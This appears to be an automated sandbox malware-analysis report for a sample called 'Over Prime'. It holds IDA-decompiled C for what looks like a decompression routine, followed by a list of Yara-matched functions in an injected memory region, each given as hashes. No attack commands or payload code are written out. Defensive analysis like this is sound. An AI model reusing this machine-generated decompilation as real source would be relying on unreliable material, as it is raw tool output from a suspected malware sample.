Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407567
0x0040756f
0x00407573
0x00407575
0x00407578
0x0040757a
0x0040757a
0x0040757c
0x00407583
0x00407585
0x00407585
0x0040758b
0x004075a0
0x004075a8
0x004075aa
0x004075ac
0x004075af
0x004075b0
0x004075b0
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075bb
0x00000000
0x00000000
0x00000000
0x004075bb
0x004075bf
0x004075c2
0x004075c4
0x004075c4
0x004075c7
0x004075cd
0x004075ce
0x00000000
0x00000000
0x00000000
0x004075ce
0x004075d3
0x004075d6
0x004075d8
0x004075d8
0x004075de
0x004075e0
0x004075f1
0x004075e4
0x004075e8
0x0040788d
0x00000000
0x0040788d
0x004075ee
0x004075ef
0x004075ef
0x004075f7
0x004075fa
0x004075fe
0x00407600
0x00407602
0x00407605
0x00000000
0x00000000
0x0040760d
0x00407613
0x00407615
0x00407617
0x00407618
0x0040762d
0x0040762d
0x00407630
0x00407632
0x00407632
0x00407634
0x00407639
0x0040763b
0x00407642
0x00407644
0x0040764c
0x0040764c
0x0040764e
0x0040764f
0x0040765e
0x00407662
0x00407666
0x00407669
0x0040766c
0x00407671
0x00407674
0x0040767a
0x00407681
0x00407687
0x00407880
0x00407880
0x00407885
0x00407894
0x00000000
0x00000000
0x00000000
0x00407885
0x00407694
0x00407697
0x0040769a
0x0040769d
0x004076a1
0x00000000
0x00000000
0x004076ac
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x004076c1
0x004076c2
0x004076c5
0x004076c8
0x004076cb
0x004076d1
0x004076d3
0x004076d3
0x004076db
0x004076df
0x004076e4
0x00407709
0x0040770f
0x00407711
0x00407713
0x00407716
0x0040771f
0x00000000
0x00000000
0x004076e6
0x004076e6
0x004076ef
0x004076f3
0x00000000
0x00000000
0x00407704
0x00407704
0x00407707
0x00000000
0x00000000
0x004076f7
0x004076fa
0x004076fc
0x00407700
0x00000000
0x00000000
0x00407702
0x00407702
0x00000000
0x00407704
0x00407728
0x0040772e
0x00407738
0x0040773a
0x0040773f
0x00407741
0x00407777
0x00407743
0x00407743
0x00407746
0x00407749
0x00407753
0x00407756
0x0040775d
0x00407768
0x0040776f
0x0040776f
0x00407779
0x0040777c
0x0040777e
0x00407784
0x00407784
0x0040778d
0x00407790
0x00407795
0x004077a4
0x004077ac
0x004077b1
0x004077d5
0x004077dd
0x004077e1
0x004077e7
0x004077b3
0x004077c1
0x004077c4
0x004077ca
0x004077ca
0x004077eb
0x004077a6
0x004077a6
0x004077a6
0x004077fc
0x00407800
0x0040780c
0x00407807
0x0040780a
0x0040780a
0x00407814
0x00407819
0x00407821
0x0040781d
0x0040781f
0x0040781f
0x00407827
0x00407829
0x00407830
0x0040783a
0x00407844
0x00407860
0x00407864
0x004076a9
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x00000000
0x004076bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407846
0x00407846
0x00407846
0x0040784b
0x00407854
0x0040785d
0x00000000
0x0040785d
0x0040786a
0x0040786a
0x0040786d
0x00407874
0x00407877
0x00000000
0x0040769a
0x0040761a
0x0040761c
0x0040761c
0x00407620
0x00407623
0x00407624
0x00407624
0x00000000
0x0040761c
0x00407590
0x00407596
0x00000000

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02C388DE Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b70eb785a0f55252c4b38abd7ede421ac35c7d7d594162171c833e4a75845d
Instruction ID: c1d048d4a9c9e9591e6c646b836abb6df14ab320c4305f8f258cd05f873783b5
Opcode Fuzzy Hash: f9b70eb785a0f55252c4b38abd7ede421ac35c7d7d594162171c833e4a75845d
Instruction Fuzzy Hash: AD812635A04359AFCB348E3889957EF37E6AF85340F91852EDC89DB215D7318E86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38964 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b12f6ab28a7a89208c85cdbaf8ec6e0d6fd403993e5e8f35c4c6aedc79321ab
Instruction ID: 2c60f1b2d2f1a0453145edbc18e0d990d11fe0fd8bbb536d00f2c92a0b4bd757
Opcode Fuzzy Hash: 5b12f6ab28a7a89208c85cdbaf8ec6e0d6fd403993e5e8f35c4c6aedc79321ab
Instruction Fuzzy Hash: 9F613631A04349EFCB308E398D957EB37E6AF85350F95852EDC899B244D7318E86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C3896C Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d206c76d527f1653fbd4a4ab567c4ed95cd4f4c3dc7daea366764e6023819334
Instruction ID: f1952d7cf11f04fe6d6ceaad54c0eab743e4f43a72136c71b783849e9f28a16e
Opcode Fuzzy Hash: d206c76d527f1653fbd4a4ab567c4ed95cd4f4c3dc7daea366764e6023819334
Instruction Fuzzy Hash: 34613571A04359EFCB308E298D957EB37A6AF85350F91862EDC89DB244D7318E85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38974 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe652fc57f9147f2d31549e5f3925f05fc7010c58e6f8df94acc7ef9e456d77
Instruction ID: 0a2b9e5bc8acc6d3a6162248b8cc28fd6cbcb5e258de12003ba702da59bf4cc5
Opcode Fuzzy Hash: dbe652fc57f9147f2d31549e5f3925f05fc7010c58e6f8df94acc7ef9e456d77
Instruction Fuzzy Hash: 35613531A04359EFCB308E298D957EB37A6AF85350F91862EDC899B244D7318E85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C3897C Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91494326b36bf310384787c91e21232ad119a0fb8afc5feba5b264ebe817bce
Instruction ID: f7e2956408758235fe400fa1da532feacd3ef256971e78f80c5854011d1e626c
Opcode Fuzzy Hash: c91494326b36bf310384787c91e21232ad119a0fb8afc5feba5b264ebe817bce
Instruction Fuzzy Hash: A5614731A04359EFCB348E298D957EF37A6AF85350F91862EDC89DB204D7318E85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38984 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a59ecf7a393d8612519482473ad24332e3db3cc0bd3eb4b66b73864606f7aee
Instruction ID: a07de4298879a791ecd059ad5140436338e0c02cc3b882fcf106bcae1024c803
Opcode Fuzzy Hash: 5a59ecf7a393d8612519482473ad24332e3db3cc0bd3eb4b66b73864606f7aee
Instruction Fuzzy Hash: 98612531A04359EFCB308E2989957EB37A6AF85350F51862EDC899B244D7318E86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C3898C Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5cd4335a52076e679abb15b31d136bbf031ed5c1800ed7f9867717b1e2f50bc
Instruction ID: 8b186d3f8dd26e1f2160faaff76091df40c73a442bfd9af2f3c65cd5ab8e4085
Opcode Fuzzy Hash: a5cd4335a52076e679abb15b31d136bbf031ed5c1800ed7f9867717b1e2f50bc
Instruction Fuzzy Hash: F8612331A04359EFCB308E298D957EF37E6AF85350F51862EDC899B244D7318E85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C376A7 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2506f4430de0f711c6912ce24f07d1394abadb18a7a1f8981d4f435c69794fd5
Instruction ID: a3098158efcdfaaa2899b773225049ee66374556a218588363068fbe1ee9f29e
Opcode Fuzzy Hash: 2506f4430de0f711c6912ce24f07d1394abadb18a7a1f8981d4f435c69794fd5
Instruction Fuzzy Hash: 5E518B72A00365CFCB315E7889497DB77B3AF55360F97062EDC95AB605C330898ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A04 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c3bb5ab522faf355543a1de89a832e8f1437c0b31d41c58b94dcd0bc41795a
Instruction ID: 0d1ef38af7cc40db0ccb0ab4ba53ff67daffed0bf893a2968748a8ed907b3a3d
Opcode Fuzzy Hash: 00c3bb5ab522faf355543a1de89a832e8f1437c0b31d41c58b94dcd0bc41795a
Instruction Fuzzy Hash: BC51F175A04359EFCB308E298D897EF37E6AF85750F51862EDC88DB204D7318A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A0C Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f56d0f4cd6faa1cf3da48302dc57f7415b54545780cc0d19ebcbfc82e62cbf7c
Instruction ID: dbfac36376fa03f3565a68e1f0386be02853412c46d306f9219a53f247b76d2f
Opcode Fuzzy Hash: f56d0f4cd6faa1cf3da48302dc57f7415b54545780cc0d19ebcbfc82e62cbf7c
Instruction Fuzzy Hash: 96512531A04359EFCB308E398D857EB37E6AF46350F55862EEC88DB255D7318A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A14 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecd28c5e22406be1ca483701d06032266862bf860dd7970e7d36b582a048c42f
Instruction ID: aebcc6e1fb85743b1a8f7df4dbabd381774049bcfe7267d2f0dc4649cb6db978
Opcode Fuzzy Hash: ecd28c5e22406be1ca483701d06032266862bf860dd7970e7d36b582a048c42f
Instruction Fuzzy Hash: 3D510235A04359EFCB308E298D857EB37E6AF85750F51862EDC88DB214D7318E85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A1C Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d2c5426f3a259d09d119faa5b48cbb3cef744eb0e115067e91dd4738b1a20c
Instruction ID: cd34a632aa51ee8cdf6bc456ecf644482c33cc9f431ad523921c35a5682eab01
Opcode Fuzzy Hash: e5d2c5426f3a259d09d119faa5b48cbb3cef744eb0e115067e91dd4738b1a20c
Instruction Fuzzy Hash: 69510235A04359EFCB308E398D857DB37A6AF85750F51862EDC88DB214D7318A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A2C Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5804ae4e170658080609ac2119c3894f75a48557d6ba30b8f86ac53e831f72c1
Instruction ID: 246df35d2abeb2df16be617f2e71117ea9a2eff2aea87eacbc25e98f9ef024ce
Opcode Fuzzy Hash: 5804ae4e170658080609ac2119c3894f75a48557d6ba30b8f86ac53e831f72c1
Instruction Fuzzy Hash: 69512335A04359EFCB308E398D857EF37A6AF85750F51862AEC889B244D7318A85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A24 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec69ee778c4966323cf2be1ed8975381611aed37f4e475116fc8020bab67aca
Instruction ID: 8a4588207adcdb5d89724c3a49dfbfe42dc38ec8e1f599bd559bba801b9bfcfd
Opcode Fuzzy Hash: dec69ee778c4966323cf2be1ed8975381611aed37f4e475116fc8020bab67aca
Instruction Fuzzy Hash: 2E51F235A04359EFCB308E298D857DB37A6AF85750F51862AEC899B204D7318A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A34 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039b6b14223a351477adbb7d965a56e487434bd4115a566d69c02d1e1df595b2
Instruction ID: 5f04d5afa9be9e7d8f1cc18674ec016dc72e757dfbb70e8661ae8b8fabc5807f
Opcode Fuzzy Hash: 039b6b14223a351477adbb7d965a56e487434bd4115a566d69c02d1e1df595b2
Instruction Fuzzy Hash: 3751F135A04359EFCB308E298D857EF37E6AF85750F55862EEC889B204D7318A85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02C38A3C Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea18213eb7ba27b7a586b74afc06b963a1c8065739edb888d7d4ba49a30f92b
Instruction ID: 33d666bdbd5fee4f82e7a251dc38f665a646025a1f08840c6f62057894f32daa
Opcode Fuzzy Hash: 7ea18213eb7ba27b7a586b74afc06b963a1c8065739edb888d7d4ba49a30f92b
Instruction Fuzzy Hash: 76511435A04359EFCB308E298D857EF37E6AF85750F51862ADC88DB204D7318E85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C37728 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c672242f80b2642be240d6dcbc088687da5e7e3c5536a173fab0f82f5eb175
Instruction ID: 7bca38fc72000c9567136b7d5f7104c47a42d18c07136467e2b60a0643f8a10b
Opcode Fuzzy Hash: a3c672242f80b2642be240d6dcbc088687da5e7e3c5536a173fab0f82f5eb175
Instruction Fuzzy Hash: 44415A72900355CFCB315E7489487DB77B2AF99360F9B022EDC956B245C3308D85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02C38B90 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e060a9ee7bede9b06d6b66964d0fd8ca74f1cd07773467a224877ee541856ac
Instruction ID: 7f8191da755761c499542de6d10250a150bfdea9597fca8be64c545ec989db0f
